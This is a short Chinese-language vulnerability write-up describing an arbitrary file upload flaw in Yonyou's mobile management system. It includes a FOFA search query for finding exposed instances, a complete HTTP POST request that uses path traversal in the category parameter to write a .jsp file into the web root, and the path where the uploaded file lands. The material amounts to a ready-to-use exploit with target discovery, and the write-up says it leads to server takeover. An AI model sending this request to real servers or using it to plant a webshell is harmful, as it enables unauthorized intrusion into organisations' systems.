用友移动管理系统category任意文件上传漏洞
一、漏洞简介
用友移动系统管理是用友公司推出的一款移动办公解决方案,旨在帮助企业实现移动办公、提高管理效率和员工工作灵活性。它提供了一系列功能和工具,方便用户在移动设备上管理和处理企业的系统和业务。用友移动管理系统 /mobsm/common/upload存在任意文件上传漏洞,未经授权攻击者通过漏洞上传任意文件,最终可以获取服务器权限。
影响版本
- 用友移动系统管理系统
三、资产测绘
- fofa:
app="用友-移动系统管理"
- 登录页面
四、漏洞复现
POST /mobsm/common/upload?category=../hotwebs/mobsm/uploadComponent HTTP/1.1
Content-Type: multipart/form-data; boundary=00content0boundary00
User-Agent: Java/1.8.0_381
Host: xx.xx.xx.xx
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 123
Connection: close
--00content0boundary00
Content-Disposition: form-data; name="file"; filename="stc.jsp"
test
--00content0boundary00--
上传文件位置
http://xx.xx.xx.xx/mobsm/uploadComponent/visitor/stc_20230819071510697.jsp